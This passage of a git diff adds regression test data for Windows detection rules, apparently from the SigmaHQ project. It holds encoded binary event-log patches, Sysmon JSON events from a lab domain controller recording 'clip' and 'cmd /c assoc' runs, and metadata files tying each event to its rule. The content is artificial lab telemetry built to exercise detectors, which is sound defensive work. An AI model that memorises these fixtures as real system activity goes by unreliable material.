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 seu{HD!~T{Px# literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json new file mode 100644 index 000000000..fdf5019a2 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:33:00.990279Z" + } + }, + "EventRecordID": 11989935, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:33:00.989", + "ProcessGuid": "5AA13A44-09CC-68FD-4336-000000004002", + "ProcessId": 1060, + "Image": "C:\\Windows\\System32\\clip.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Clip - copies the data into clipboard", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "clip.exe", + "CommandLine": "clip", + "CurrentDirectory": "C:\\Users\\Administrator\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F3F4BE6C6A42072CBB74D05E3EBE285FB24C56CF,MD5=61C8E9DEC5E3AEA798C2862CD4565CCA,SHA256=ABAF131EA0A608072574D7C77A6EE5175CA13E361DE18146A54A78CBD868BFF3,IMPHASH=FFEDF33A1AF6412E26F1F659C12D5FF7", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml new file mode 100644 index 000000000..7d1d79487 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml @@ -0,0 +1,13 @@ +id: 4ea9d42e-437f-4c56-8173-bdd8cafd72be +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ddeff553-5233-4ae9-bbab-d64d2bd634be + title: Data Copied To Clipboard Via Clip.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_clip_execution/ddeff553-5233-4ae9-bbab-d64d2bd634be.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx new file mode 100644 index 0000000000000000000000000000000000000000..df8accd0df83555b81967a5b40dac0c35bc38172 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json new file mode 100644 index 000000000..f1b1d7319 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:04:38.507492Z" + } + }, + "EventRecordID": 8302863, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:04:38.497", + "ProcessGuid": "5AA13A44-CAE6-68FC-A62F-000000004002", + "ProcessId": 7816, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c assoc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml new file mode 100644 index 000000000..ce83d82c8 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml @@ -0,0 +1,13 @@ +id: 1a0606d6-3470-45e5-aeea-16098357e709 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + title: Change Default File Association Via Assoc +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/3d3aa6cd-6272-44d6-8afc-7e88dfef7061.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx b/regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/7c9340a9-e2ee-4e43-94c5-c54ebbea1006.evtx new file mode 100644 index 0000000000000000000000000000000000000000..e3402971fe982884aa8f91a28bd1a7262fbea8c5 GIT binary patch literal 69632 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 